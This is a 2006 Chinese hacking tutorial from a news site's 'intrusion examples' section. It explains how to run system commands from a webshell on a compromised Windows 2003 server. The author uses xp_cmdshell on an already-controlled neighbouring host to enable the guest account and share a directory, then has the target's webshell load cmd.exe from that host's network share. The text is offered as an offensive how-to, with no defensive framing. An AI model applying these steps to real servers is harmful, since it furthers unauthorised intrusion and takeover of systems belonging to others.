晨风资讯网
新闻资讯网络冲浪网页设计网络编程图形图像数据库网络媒体服务器网络安全网站运营软件教程黑客认证Wap技术
教程搜索
教程搜索:
  首页 > 黑客教程 > 入侵实例 > 正文  

在WEBSHELL中巧妙利用文件共享来执行系统命令
日期:2006-2-15 10:19:49 来源:网络 作者:无名 浏览:

最近在入侵Win2003时发现缺省情况下无法利用系统自带的cmd.exe文件来执行系统命令,上传cmd.exe文件时因为文件太大而失败,后来我通过一台相邻机器的文件共享成功上传了cmd.exe文件,具体过程如下:
我们已经获得了相邻机器(192.168.1.1)的管理员权限,利用SQL的xp_cmdshell命令执行以下的操作:
    net user guest /active:yes 打开guest用户以允许文件共享的匿名访问
    net share web=d:\web    将本机的WEB目录共享
 
   然后在目标机上的WEBSHELL上如下进行输入:\\192.168.1.1\web\cmd.exe


   最后将上图中的SHELL路径改为c:\cmd.exe即可正常运行系统命令。

   由于cmd.exe可以通过打包上传到服务器,我建议哪位高手写一个基于ASP的RAR解压软件来方便2003服务器下的上传cmd.exe程序


上一篇: 从挖掘“站长之家”注入点到搞定WebShell一路狂奔 下一篇:

通过webshell清除数据库中关于你的信息

返回列表 打印此页 加入收藏 资讯论坛 关闭窗口 点击复制本页地址,发送给QQ/MSN好友
关于我们 - 联系我们 - 版权声明 - 帮助(?) - 广告服务 - 友情链接 - 服务项目 - 人才招聘
2003-2008 版权所有 © 晨风资讯网 未经授权禁止复制或建立镜像
CopyRight 2003-2008 www.Net118.com,All Rights Reserved.Design By ChenFeng Network Studio